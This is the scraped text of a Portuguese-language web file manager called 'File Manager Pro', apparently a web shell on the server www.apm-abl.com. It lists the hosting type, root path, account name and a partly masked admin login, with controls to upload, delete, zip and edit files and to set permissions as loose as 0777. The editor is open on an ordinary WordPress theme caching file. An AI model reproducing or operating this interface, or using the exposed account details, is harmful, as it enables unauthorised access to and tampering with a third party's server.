🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_83fb36a6 / 8f4b****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: BluehostCache.php
<?php if ( ! class_exists( 'Endurance_Page_Cache' ) ) { return; } // https://github.com/bluehost/endurance-page-cache class ET_Core_LIB_BluehostCache extends Endurance_Page_Cache { private static $_instance; public function __construct() { $this->purged = array(); $this->trigger = null; $this->cache_level = get_option( 'endurance_cache_level', 2 ); $this->cache_dir = WP_CONTENT_DIR . '/endurance-page-cache'; $this->cache_exempt = array( 'wp-admin', '.', 'checkout', 'cart', 'wp-json', '%', '=', '@', '&', ':', ';', ); } public static function get_instance() { if ( null === self::$_instance ) { self::$_instance = new self; } return self::$_instance; } public function clear( $post_id = '' ) { if ( '' !== $post_id && method_exists( $this, 'purge_single' ) ) { $this->purge_single( get_the_permalink( $post_id ) ); } else if ( '' === $post_id && method_exists( $this, 'purge_all' ) ) { $this->purge_all(); } } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar